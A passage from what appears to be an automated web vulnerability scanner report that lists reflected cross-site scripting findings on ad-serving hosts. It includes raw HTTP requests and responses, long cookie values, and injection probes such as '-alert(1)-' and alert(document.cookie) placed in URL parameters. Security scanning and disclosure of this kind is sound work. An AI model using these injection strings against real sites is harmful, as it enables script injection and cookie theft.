rsi_segs_1000000=pUPF5E+huQIMpzaxu2F29/z47hsEuy70RDTXd+G914J5660Uet4p7ETo+SWdpq+vjO9FyOb/GDElu8b1fCaRSIFw62TMPNHPf1Uqx8gUmMOMvyrrcedIMSklF2GlAYMSmIrtIJZyfP4Pyydb8gGQEEVPTWfUru16M3wgUTloRa1DGnHu9DnMc1auc8rlJvnrDyarDpRAiyIQYfRUCqgexMmvNfqE58La5XcyKE+kxELSBAa1/zYpbUyjmtOB0OtvZe/sCmSBGoAR5kOdyqrD2IhtKDv6Hm7ELwKhW1/80SlfI4rFnrJLbX7UnZAInsxa5gAJo4kYyL9wP83gjFu21v+Ljbe4JXONNcHEu0Gce1eCZSt7gMMJj5hcBujncOuzwe6JValzqkoUzG3Z4l7x9W4n035r+Thm+1dBZiGPuPRK62f5dqbS5k+dfOEB2C4Ac8yHd6NRXOls5lzqtCiPtU3yh7HMbMC7FKV4ntBCpgQuJVZdV4gB5DHvE8DJH5mJADuT5I9HoKBabFdqyGaatksuvficHH6shBTimFXWQqrZvS0wJISpelTmvT6MMLL6uX+IxeAKTal7iL3J/Ugmq+Y=; rtc_uJev=MLv/+QUJZjpn51IpAxjOavnaN4hKHsFKsArs1un9DiMi54ZO4wU4y0HsTfVxQcrrHSlE5FfEOUQroSDJyCQsxdLt7/+VDDyQPWRIX0xytnLBcQo53lKbEFpO3wIAuZz8HZvTV4jq26xTQlJbMB51kHXRMAfIYvU73OSE4v31+q1AsUQlmSW4MDxsUSl5syf9EAwGgMz8aTvWQss79Aoznerv/oPoLcS3IZ+nWYWt+OUqy+XB+Z60V8o7HQEhaE3h69iJIn8VtBpn+JyggNrNZP6VE97ADibCZgnznBHV4DQAPlI5qn054L4TEnkAg74ZDWQcD2+RFoWZBsYuvxEiPGirR+WcagTHF5VLx+nbqzqWKSXuZznwqyEnYlBZlUSMiSfGOoGVGMZlj87aQGSBYaESVnBO1uZ+YvFCIZJaEs5noLzF9OvdIjFsqjm2CXCcjyBP0B3WamO/GKhCvFjJwLorslmR8lc1xhZEq2W9AThoxiDM2IPsMHPt00376pU9pxVxN4J4i7BaEsFj71txvTn8wxVHX2mJYKppvllHdj4p/TXP8vuko61EuIhnljjwr+r2y/QmWzZfKqIejE1/03rU76tNeFBRDWR8aOyipbeh+uyTUpNI4F5CYz7Gvx2cycfmR+h+2FFCiEnrGz5xIiEZe+vlbLuOP1Teb0Mm5AoWhxh5E4NHL8ip21OpNqRAst/Owp+rabyr+y/wSDSU+PgbsrPOrZuP5DdctZS2vZ31/BspFFynU0vInbd6C8M41e7tObXyHbSc6JY6oL+ry8yJypsCxvlch7UL9bFNYKo3QoHT/b0K24rjLq7b5CyoVKlSHFsYW/nT1UbxVRlK9xjsUKgOW8+WD7LLJ9aLBOSXxXEa2gDU+FShT/yVZ5ST8Gz7fXtIczqrXFvAz8gojNIMCeZLGGJGSr78JZ9B5hC0PJWZsjLvZEMR9emYXBe71pQr3U5g6O2gnG1Q1x4RFm1ZsuLTctS2Np44xP9z1I01uEqcYVAaRagWGq3VZfYeqkuoIKPi9MID+Ndo1pamWoRhdiBEgrN8lO7+XLOBqApQ7zAcuZmjE79m8JfUvicISIu1O2QI93UXBytj5kmlaOEzXPGeEPnLopVuqvJFT7XOoD95J4ws49PwJ+b41WcNJEVpXCnmGfcw8Ej5o/D5gQrEGOQbM2/Di7zsqPFXCk86l8pOcnoG0KnNkQOrdlhL0nMtTPxLFVJrxsWl2mdpxlk1grOkmm7m55QD6zgCVxLlBr5W8BY3nx8MiGYxs6KwwKe9uC+UDtslJGuHjK3vuQ5LI5FUjgWFctA6iJzjR0icFenZZ//wsVxgnH/AWVfu6vF+4a3RpKHlQXo/pra89IahUKf47qaLJWe+MNyvehXi5zuM84yZ4jFAGTkXh3HNCMYB16La9jg3t61HuYu2OIPNgP2I6I8tKA/ddo95qmopGg1jO43mLmFxgw4jb3T5pohnBBGs9+VPqCDIH6fSfj4KT+Rq+SNTGT7GfVEEKjwlKoNUNuIfawbdFDh6vB1VD0LW3DoOKTu7bNZ0zmnOWEjGMwebwQJRel1UTreh58fk0xF4gmP2UyeCCLNFcjK1vTciJUUwxoD2b2Y4enJAjiKy+KHl4t4BEUiBU+PwDLGt2Yc2brjSeJv7T6uHZrAsKqTRn48kG3AJXwOH7Mx7OE1yp1NoSHAyf22LDiTxLdP56pliRIjXpaTOT5ht8EbsH2uvTGXedE4iACnn7pwC9AMI6JByiXZotWH9gO8HP2GMoEiL7+6BashzcvvO7rt5EFMabkI7WKoriB99Ei88GODv6SqOupixyBnZfVB7fNZcbPD6+XNkGjE+ne6rklaCQhg9HcHbo1AwbkR1b2wnnWzwGOlASKP3Qbsj33yIssJxC7LvmxZt5+feLVUlKnJpEHVToa0wnWJ5hbBK; rsiPus_xAcs="MLsXtaEubzhnJ5H4uuj6RIn8xZaw1LAEWBmSre0b4sZdUBIO9/+QaGI8haJsP3JhILgZSp1My4GE6Vb9IpffwRghX2HMhg6NO7oSGPPBHeXbeyZm2kCVYlCpZS666NLUrxjYRtHTnRwjNNGLfBGE8mdTT5t2SfkCbcVNn+zbT9uT15r8g0GSlaiFHwm+Ot/unzv9nPq58USCe3gS0fSsxfDOHyxulhvlMrdS42lagneTgNefoyzO0Fr2JIawRqNiXmmjNVMaJrQ1ZebW93nsjuUtro4XGLLPx7UbdM1cBSapwRRFyCOwQBodwvoyty+CF6vPgc6cYlkN6Cy64hMRC9hsQRveOWunCxMPo/izJXSIvFy3gMegP2rBVtZAjZKDIklIlGBrwJUpCXAY36fJpBu5KANXZzhYuER4xlMs5f+86QOizootJtPFYTjHIkhYyKhGRerRFol9gBfX4W2raZpGSMlmWoQ6nfIv9Gq8xevtqGoZ0nxQjefIO3AaW6RL8MKFMWgV3PqSKP5I7CJUDZzva1lTOCc/qvx4i7drcIQD/VG29AHLJC6LfXXfH8+0I75aQ2HfJMsGyEIbhDO3gqihSv7TZr1+nxKA5RSJJZ+VW2m2CLV9lKTjaEgLm8t0HRKpe8ZXjM9tjUWXWLGUB91sPhCuLXXHj2cwuVZUpf32b2jtSGxvz0TpJE6/Ws022v0SeJwsjY8mW93jYVy3iQbPjblWZg6RvogvuOb47Qe+Xj3LOeZ+B4qDRWKFealchpK6jZiGj9D1Yh+LHYAc1gcRHESco8BF5keg+yg+pVK3FfhPD6cKZDz81+1wIEZE2PxIU1lBWEYQgLNAqmP3/Vq0OCffM8IWMvC/g3VLB0DK9hAderMags/QWdobxRmgLQlJd+JqBVxi40QiZjE+EU3FGvGbfGrxOsO55UEea8jQBF4NtHpI12UCMQddc07iU4MNon1s1rx4VHZ6077sV40OhnEkSUkc1XcErSvSjr8seEo+BluAUP9iIQ4pBeJcvJ5w3LM18cdgO7EOb3ER+XOhPpGuh5y3p/icgg6SARMfX8BSH+9rfz9+d/9O6aW/8Unc/CDA30Y4TrbhIzCQOgZOMAcGskEjrD1jQuY89fmVuZt5Bk/qpIe5QLvSLRQRsySc30WZZQmH7LMyZgU3S3lapQXhmx80Dtwoq6CM8uwdMDAAAX7UXvJrjMxI598OVZBrasGtiQ=="; rsi_us_1000000="pUNdIy9H8BcU1P0/aqfkn2N1Ap5g5xkLPVaivNiRJr2tZwMLeGNala4ID3nHh2cF+Gsw6USDHERTcAJfp3cNryuAzA6SuOiGdFIutB3dZ/T8x+dO+hmlVHb2yh4tEImGScOe3p8MWsj5ypTMUnI9ferMTyksjj76yG7Nk9kokeO8VL96ii3fLPe0QzjfHxSBWWq75UtXJnuMjB9bcIMAkB9UJAJ/S0rx23QzCAKU6C6rCTVhVVitZTOtAQ1ZE50PI7pYdqvGjhKw1/Je5vobciGwlQ5pVOxqQ9Dv7SaM7WEls1mZTePd7ngyzvUJcmwECsNi6Zhc2zDC8vsxy0J7nsGy4bmsxLaIX0PaZQEg3zsI1ME8qKu7NfG4v0UZaMbda/KwX5lbp7msmVxxYLXzPPG+BnKMPZHi9AP8Xs1twIoyWMH5UfZuMQrUP4YPcUTIXaBTLxacRWz5EwOKHJvsoL0UTKdMOtMz/101b/i8yWhdmb3p0yxUobDJzhzavxOdQQ9pGEJBNZRxzyG7i/2vacfZgFohS2v1gU5/1zcVmUhR+bRSIV5j28JfNkiSM65QfllM+5uq+aAuswZ7NlJNhQJrDcqWF6Wue71GyH8mfVc3XZy2TM8WwMIobcVwHd2z/YnWx3X9pKO+Qh4K10O3s23QZybm2oQ/sBScd+h9F0DZN7jluQS4DDxBM05Ml2p++zvjCpfGffgNZeWZfzFmgLD1cDR37EhDrC6gtt1hR4XCuKcIIJJlAaoy7sn2KH5gZ0uQbcbiXgOInGkS/rGfKXxO651CjNZI5V0ukm6x2wQagjxGgNDmViTLvY6N12Krh3sGelYntEM/NEi15rnx8Cg/Y7f7so8cWtv5AO098HZPvOQL1Q58I+qK7zNdOi57osoHpl2Vju55Suq1RXqyiZFPlRdTs/9Rckn0c9+0e4ICEwVykHjhrZfsFft6QYinBMX0RIGssmU+nPJld/96oOkeJL4/vrVL5e+Qa+hvscGITKwHDfJz+rLp/y63sz018w67p7Js5W0hn9TJ9uN//OgZp8YOY9xPoRPtPHS0xaldxvNbtj9iAAD2tPLBEK/rPeGqJh8KqPc5IuceiV5Xld8ORV+3QsyW0tgMdLEi/zNoTVMVQZaKVtefr/qdzVYlw0Qou9+RYrGWsUkKFw1L0ITk90I8MmkxD1dP9G2ypeedlQ2UWOpPNEllJSEN/qEl7jFbd/fIFwGkQKNnUhAxGVZUPX96qEhkS8IphDNvxP9sdvJdXeGkAsZ5W3O0IFjQebtKipu6pusUtddKXkQtb4+eXKtJOwy5tlxHKUgqOkv8uAZL5zS7Au8uTZhWhDSqHn4PyIxIbyh6NLaHdj1I/bEiqmdUropmocRRVmGCCJjD4luuLweguSW+SMCyLpZ06GwvOz2PPULSfSgYsOQShUytccaYUQXE89am8h8QuDTHIlSkKjlJcsN+M/QxFbQkaiqnvZOZ/9EKFg/gp+H1ZzVZIRIIO7bxESvpoZL5YsHSdUc7Vk74RKXe+iK+kCD0eXKa6s1RLgkSLyczMUCr1ccOMBIwvnQRwtKR+dTUqDR4ysAwAJVJ/RFrcD08JJFG5WItAVI="

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 14-Jun-2011 11:21:10 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Mon, 13 Jun 2011 11:21:10 GMT
Content-Length: 864

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=514&size=728x9069369'-alert(1)-'a8318c35dc5&referrer=http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html%3Fc03b0%2522-alert(document.cookie)-%25225958ea17fd2=1&inv_code=748066&redir=http%3A%2F%2Fad.yieldma
...[SNIP]...

4.52. http://adnxs.revsci.net/imp [s parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adnxs.revsci.net
Path:   /imp

Issue detail

The value of the s request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a7888'-alert(1)-'4414a9728dd was submitted in the s parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imp?Z=728x90&s=748066a7888'-alert(1)-'4414a9728dd&r=1&_salt=1188639314&u=http%3A%2F%2Fthesouthern.com%2Fsports%2Fbasketball%2Farticle_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html%3Fc03b0%2522-alert%28document.cookie%29-%25225958ea17fd2%3D1 HTTP/1.1
Host: adnxs.revsci.net
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html?c03b0%22-alert(document.cookie)-%225958ea17fd2=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e047724&2&10055,10194&4dde515c&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e11aa0e&9&10133,10640,10654,10670,10448,10450,10451,10452,10454&4dec54ae&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzUJZjpr3tvXN1o+eD1xyIxlcCzatusCBJfE++0lLQNuuXZ5CT4uCSvFPNQT0hWbCTwwMzUmQfYqdTBpI9P3N3q3chR3MaWlhMjJbUeocpd1O8Sgep+oaO+IjRgHcIUICJud0O7fqoub6TzalGXqnPwzJJ5UHJSv8ywcjnyWu9H1Wcq4/KgDP73Tkh6HLB0Z+W9dmaFbUDYEXkJJpS/iw75tOwTfW/giI2GJS9b7su1iFqfUhySYGYOfDr66p86QMf+3SfQ4fFb2Vu95sP8xVU7ZWYkqKbJ9lF5lwMZv0GFqT5FCANCoeasHEnwpVDhWPUUcyw3O+p/f6CtRpHq1uaDk8uR9A28Y/odkGciZh7BdP3QWkgS+R03ooqkAF8AQoY9798jZhSIyqMD+O6SUZzfQ8eOLFZ4AAD7HeRUnfiI8B1nXx1a5s7qlk7ClFgGL2Yq7H7+N2D4YiJprcBFz5fA7pP+kSJKLeO3W8jV+fLTzCGfRdkSjdf+RWEeCttzckiQvPAoC2QhDMQw0hXnRHTB1GmUyO5yjJA5BVOpdLjeZlZwv21g6KJUaXcSZIErbyiyEwjw62RnxdA7s/LzMfqxtu4aRGWXeXeTN5OLXSeLoL4b0+E4Zqi+3KFQa+kqdtj1O/Uc65tiz3oFHjnL7uM6b29XqgW36mdYJf89adJmpDywmcjAenBlttURV48nlyj2WhrDe7c3RTF71orGDwSGXQ9ITD2bLusjZmZ8DVXaVqq8gjQtB3Q0tNCzKXlHMC+WEOt0dZQQopNKg6tTWp2tcfg7djY9ScV1IlU6jHxtcmrfslpsawJMcFf4ejv0FxL7++UYuwpCrJAA70ropBNG81+SSRZaybc9VhfBssPc+Uu83WpqpFIyXGeCiRALOBfO1MBfVx01dJ/8xWrxsW6Kt3RCLNThehKTDVQoystHiA8DJ8JGsLNtM5T9kglABxc5q/C2SPQ0kzenYBk5z5hLecLP7BjpFppgUel3sfsVRC7axsMKyHU1L5SJQl7sneRxqKD1D7QAD3l8/OI/HyLQplLYh7pBm6nY2agtV9iM77mVnunJgFn0HrAzbZiMiqzgZYd3bJIvLOP1L3enggvJ1ySeUuoLsryCTCPGMmqUDWMQDuweD2bB/NCNIVYfDeg4Kbe3Ayl9sO7yfCGCMrq6gCTS7UirE/q3nlAA/GE3bxaDPhYPM192eTUaVBICJ0uyCPqidVm3spNzLnL1Xo4EVjkyNS/1FuCBooatVAkJSCkzrrdaSRucVP+4VvJLQFozrH9YXuIiN/MhejzIDoYuHEut5UjNuNGmteXVgVnT2HjB7TwKoS0Sr5NZzwuaYNN8/vkn79fazjkOovj02xfsuxH3hqE6sFAf8+NAXhY/UdyNW6HxTy8saA/jFzKuB5qb/kJmUEaAg/EIRLhBAfG6CbK8KNbLrIchGA1fYfUDeKEO5dw/0I7pV1rIoGkXPD+j1p7I7FUeNEdZ3O1ad/7JzNMKkzuVXQVkVYQfnrJK5LfJ1qkGgL3jQldlBDiEGo/Fhn/Zxvscjh42kHH1J4nAyN6jZTRKv9Tz6Fuv56uSvHIiqOwgFoTGhEzt1k0ZHfM/5MO4sDbKMniVh+BbO8KpbZaTqsTNklzTkHPYdFWnA1/Imf2J7oiHp8nq7IWdDJ9IgiUWYNMRUJk76JvRI68ooK5NdD/t9uk3T01csXkVupfPIHpU0pVUKXch7fKhaanmX9RrTHO1KK8l/H/IK8VLviuOjDLQyTBR5r/rFnaqw31EU1wt7AqzRQv0MtLt5AhBy10UG7hHJ/582xNFtZVdIzV3+sMUymXk+e7aW; rsi_segs_1000000=pUPF5E+huQIMpzaxu2F29/z47hsEuy70RDTXd+G914J5660Uet4p7ETo+SWdpq+vjO9FyOb/GDElu8b1fCaRSIFw62TMPNHPf1Uqx8gUmMOMvyrrcedIMSklF2GlAYMSmIrtIJZyfP4Pyydb8gGQEEVPTWfUru16M3wgUTloRa1DGnHu9DnMc1auc8rlJvnrDyarDpRAiyIQYfRUCqgexMmvNfqE58La5XcyKE+kxELSBAa1/zYpbUyjmtOB0OtvZe/sCmSBGoAR5kOdyqrD2IhtKDv6Hm7ELwKhW1/80SlfI4rFnrJLbX7UnZAInsxa5gAJo4kYyL9wP83gjFu21v+Ljbe4JXONNcHEu0Gce1eCZSt7gMMJj5hcBujncOuzwe6JValzqkoUzG3Z4l7x9W4n035r+Thm+1dBZiGPuPRK62f5dqbS5k+dfOEB2C4Ac8yHd6NRXOls5lzqtCiPtU3yh7HMbMC7FKV4ntBCpgQuJVZdV4gB5DHvE8DJH5mJADuT5I9HoKBabFdqyGaatksuvficHH6shBTimFXWQqrZvS0wJISpelTmvT6MMLL6uX+IxeAKTal7iL3J/Ugmq+Y=; rtc_uJev=MLv/+QUJZjpn51IpAxjOavnaN4hKHsFKsArs1un9DiMi54ZO4wU4y0HsTfVxQcrrHSlE5FfEOUQroSDJyCQsxdLt7/+VDDyQPWRIX0xytnLBcQo53lKbEFpO3wIAuZz8HZvTV4jq26xTQlJbMB51kHXRMAfIYvU73OSE4v31+q1AsUQlmSW4MDxsUSl5syf9EAwGgMz8aTvWQss79Aoznerv/oPoLcS3IZ+nWYWt+OUqy+XB+Z60V8o7HQEhaE3h69iJIn8VtBpn+JyggNrNZP6VE97ADibCZgnznBHV4DQAPlI5qn054L4TEnkAg74ZDWQcD2+RFoWZBsYuvxEiPGirR+WcagTHF5VLx+nbqzqWKSXuZznwqyEnYlBZlUSMiSfGOoGVGMZlj87aQGSBYaESVnBO1uZ+YvFCIZJaEs5noLzF9OvdIjFsqjm2CXCcjyBP0B3WamO/GKhCvFjJwLorslmR8lc1xhZEq2W9AThoxiDM2IPsMHPt00376pU9pxVxN4J4i7BaEsFj71txvTn8wxVHX2mJYKppvllHdj4p/TXP8vuko61EuIhnljjwr+r2y/QmWzZfKqIejE1/03rU76tNeFBRDWR8aOyipbeh+uyTUpNI4F5CYz7Gvx2cycfmR+h+2FFCiEnrGz5xIiEZe+vlbLuOP1Teb0Mm5AoWhxh5E4NHL8ip21OpNqRAst/Owp+rabyr+y/wSDSU+PgbsrPOrZuP5DdctZS2vZ31/BspFFynU0vInbd6C8M41e7tObXyHbSc6JY6oL+ry8yJypsCxvlch7UL9bFNYKo3QoHT/b0K24rjLq7b5CyoVKlSHFsYW/nT1UbxVRlK9xjsUKgOW8+WD7LLJ9aLBOSXxXEa2gDU+FShT/yVZ5ST8Gz7fXtIczqrXFvAz8gojNIMCeZLGGJGSr78JZ9B5hC0PJWZsjLvZEMR9emYXBe71pQr3U5g6O2gnG1Q1x4RFm1ZsuLTctS2Np44xP9z1I01uEqcYVAaRagWGq3VZfYeqkuoIKPi9MID+Ndo1pamWoRhdiBEgrN8lO7+XLOBqApQ7zAcuZmjE79m8JfUvicISIu1O2QI93UXBytj5kmlaOEzXPGeEPnLopVuqvJFT7XOoD95J4ws49PwJ+b41WcNJEVpXCnmGfcw8Ej5o/D5gQrEGOQbM2/Di7zsqPFXCk86l8pOcnoG0KnNkQOrdlhL0nMtTPxLFVJrxsWl2mdpxlk1grOkmm7m55QD6zgCVxLlBr5W8BY3nx8MiGYxs6KwwKe9uC+UDtslJGuHjK3vuQ5LI5FUjgWFctA6iJzjR0icFenZZ//wsVxgnH/AWVfu6vF+4a3RpKHlQXo/pra89IahUKf47qaLJWe+MNyvehXi5zuM84yZ4jFAGTkXh3HNCMYB16La9jg3t61HuYu2OIPNgP2I6I8tKA/ddo95qmopGg1jO43mLmFxgw4jb3T5pohnBBGs9+VPqCDIH6fSfj4KT+Rq+SNTGT7GfVEEKjwlKoNUNuIfawbdFDh6vB1VD0LW3DoOKTu7bNZ0zmnOWEjGMwebwQJRel1UTreh58fk0xF4gmP2UyeCCLNFcjK1vTciJUUwxoD2b2Y4enJAjiKy+KHl4t4BEUiBU+PwDLGt2Yc2brjSeJv7T6uHZrAsKqTRn48kG3AJXwOH7Mx7OE1yp1NoSHAyf22LDiTxLdP56pliRIjXpaTOT5ht8EbsH2uvTGXedE4iACnn7pwC9AMI6JByiXZotWH9gO8HP2GMoEiL7+6BashzcvvO7rt5EFMabkI7WKoriB99Ei88GODv6SqOupixyBnZfVB7fNZcbPD6+XNkGjE+ne6rklaCQhg9HcHbo1AwbkR1b2wnnWzwGOlASKP3Qbsj33yIssJxC7LvmxZt5+feLVUlKnJpEHVToa0wnWJ5hbBK; rsiPus_xAcs="MLsXtaEubzhnJ5H4uuj6RIn8xZaw1LAEWBmSre0b4sZdUBIO9/+QaGI8haJsP3JhILgZSp1My4GE6Vb9IpffwRghX2HMhg6NO7oSGPPBHeXbeyZm2kCVYlCpZS666NLUrxjYRtHTnRwjNNGLfBGE8mdTT5t2SfkCbcVNn+zbT9uT15r8g0GSlaiFHwm+Ot/unzv9nPq58USCe3gS0fSsxfDOHyxulhvlMrdS42lagneTgNefoyzO0Fr2JIawRqNiXmmjNVMaJrQ1ZebW93nsjuUtro4XGLLPx7UbdM1cBSapwRRFyCOwQBodwvoyty+CF6vPgc6cYlkN6Cy64hMRC9hsQRveOWunCxMPo/izJXSIvFy3gMegP2rBVtZAjZKDIklIlGBrwJUpCXAY36fJpBu5KANXZzhYuER4xlMs5f+86QOizootJtPFYTjHIkhYyKhGRerRFol9gBfX4W2raZpGSMlmWoQ6nfIv9Gq8xevtqGoZ0nxQjefIO3AaW6RL8MKFMWgV3PqSKP5I7CJUDZzva1lTOCc/qvx4i7drcIQD/VG29AHLJC6LfXXfH8+0I75aQ2HfJMsGyEIbhDO3gqihSv7TZr1+nxKA5RSJJZ+VW2m2CLV9lKTjaEgLm8t0HRKpe8ZXjM9tjUWXWLGUB91sPhCuLXXHj2cwuVZUpf32b2jtSGxvz0TpJE6/Ws022v0SeJwsjY8mW93jYVy3iQbPjblWZg6RvogvuOb47Qe+Xj3LOeZ+B4qDRWKFealchpK6jZiGj9D1Yh+LHYAc1gcRHESco8BF5keg+yg+pVK3FfhPD6cKZDz81+1wIEZE2PxIU1lBWEYQgLNAqmP3/Vq0OCffM8IWMvC/g3VLB0DK9hAderMags/QWdobxRmgLQlJd+JqBVxi40QiZjE+EU3FGvGbfGrxOsO55UEea8jQBF4NtHpI12UCMQddc07iU4MNon1s1rx4VHZ6077sV40OhnEkSUkc1XcErSvSjr8seEo+BluAUP9iIQ4pBeJcvJ5w3LM18cdgO7EOb3ER+XOhPpGuh5y3p/icgg6SARMfX8BSH+9rfz9+d/9O6aW/8Unc/CDA30Y4TrbhIzCQOgZOMAcGskEjrD1jQuY89fmVuZt5Bk/qpIe5QLvSLRQRsySc30WZZQmH7LMyZgU3S3lapQXhmx80Dtwoq6CM8uwdMDAAAX7UXvJrjMxI598OVZBrasGtiQ=="; rsi_us_1000000="pUNdIy9H8BcU1P0/aqfkn2N1Ap5g5xkLPVaivNiRJr2tZwMLeGNala4ID3nHh2cF+Gsw6USDHERTcAJfp3cNryuAzA6SuOiGdFIutB3dZ/T8x+dO+hmlVHb2yh4tEImGScOe3p8MWsj5ypTMUnI9ferMTyksjj76yG7Nk9kokeO8VL96ii3fLPe0QzjfHxSBWWq75UtXJnuMjB9bcIMAkB9UJAJ/S0rx23QzCAKU6C6rCTVhVVitZTOtAQ1ZE50PI7pYdqvGjhKw1/Je5vobciGwlQ5pVOxqQ9Dv7SaM7WEls1mZTePd7ngyzvUJcmwECsNi6Zhc2zDC8vsxy0J7nsGy4bmsxLaIX0PaZQEg3zsI1ME8qKu7NfG4v0UZaMbda/KwX5lbp7msmVxxYLXzPPG+BnKMPZHi9AP8Xs1twIoyWMH5UfZuMQrUP4YPcUTIXaBTLxacRWz5EwOKHJvsoL0UTKdMOtMz/101b/i8yWhdmb3p0yxUobDJzhzavxOdQQ9pGEJBNZRxzyG7i/2vacfZgFohS2v1gU5/1zcVmUhR+bRSIV5j28JfNkiSM65QfllM+5uq+aAuswZ7NlJNhQJrDcqWF6Wue71GyH8mfVc3XZy2TM8WwMIobcVwHd2z/YnWx3X9pKO+Qh4K10O3s23QZybm2oQ/sBScd+h9F0DZN7jluQS4DDxBM05Ml2p++zvjCpfGffgNZeWZfzFmgLD1cDR37EhDrC6gtt1hR4XCuKcIIJJlAaoy7sn2KH5gZ0uQbcbiXgOInGkS/rGfKXxO651CjNZI5V0ukm6x2wQagjxGgNDmViTLvY6N12Krh3sGelYntEM/NEi15rnx8Cg/Y7f7so8cWtv5AO098HZPvOQL1Q58I+qK7zNdOi57osoHpl2Vju55Suq1RXqyiZFPlRdTs/9Rckn0c9+0e4ICEwVykHjhrZfsFft6QYinBMX0RIGssmU+nPJld/96oOkeJL4/vrVL5e+Qa+hvscGITKwHDfJz+rLp/y63sz018w67p7Js5W0hn9TJ9uN//OgZp8YOY9xPoRPtPHS0xaldxvNbtj9iAAD2tPLBEK/rPeGqJh8KqPc5IuceiV5Xld8ORV+3QsyW0tgMdLEi/zNoTVMVQZaKVtefr/qdzVYlw0Qou9+RYrGWsUkKFw1L0ITk90I8MmkxD1dP9G2ypeedlQ2UWOpPNEllJSEN/qEl7jFbd/fIFwGkQKNnUhAxGVZUPX96qEhkS8IphDNvxP9sdvJdXeGkAsZ5W3O0IFjQebtKipu6pusUtddKXkQtb4+eXKtJOwy5tlxHKUgqOkv8uAZL5zS7Au8uTZhWhDSqHn4PyIxIbyh6NLaHdj1I/bEiqmdUropmocRRVmGCCJjD4luuLweguSW+SMCyLpZ06GwvOz2PPULSfSgYsOQShUytccaYUQXE89am8h8QuDTHIlSkKjlJcsN+M/QxFbQkaiqnvZOZ/9EKFg/gp+H1ZzVZIRIIO7bxESvpoZL5YsHSdUc7Vk74RKXe+iK+kCD0eXKa6s1RLgkSLyczMUCr1ccOMBIwvnQRwtKR+dTUqDR4ysAwAJVJ/RFrcD08JJFG5WItAVI="

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 14-Jun-2011 11:21:15 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Mon, 13 Jun 2011 11:21:15 GMT
Content-Length: 864

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=514&size=728x90&referrer=http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html%3Fc03b0%2522-alert(document.cookie)-%25225958ea17fd2=1&inv_code=748066a7888'-alert(1)-'4414a9728dd&redir=http%3A%2F%2Fad.yieldmanager.com%2Fimp%3Fanmember%3D514%26anprice%3D%7BPRICEBUCKET%7D%26Z%3D728x90%26s%3D748066a7888%27-alert%281%29-%274414a9728dd%26r%3D1%26_salt%3D1188639314%26u%3Dhttp%253A%2
...[SNIP]...

4.53. http://ads.adbrite.com/adserver/vdi/742697 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/742697

Issue detail

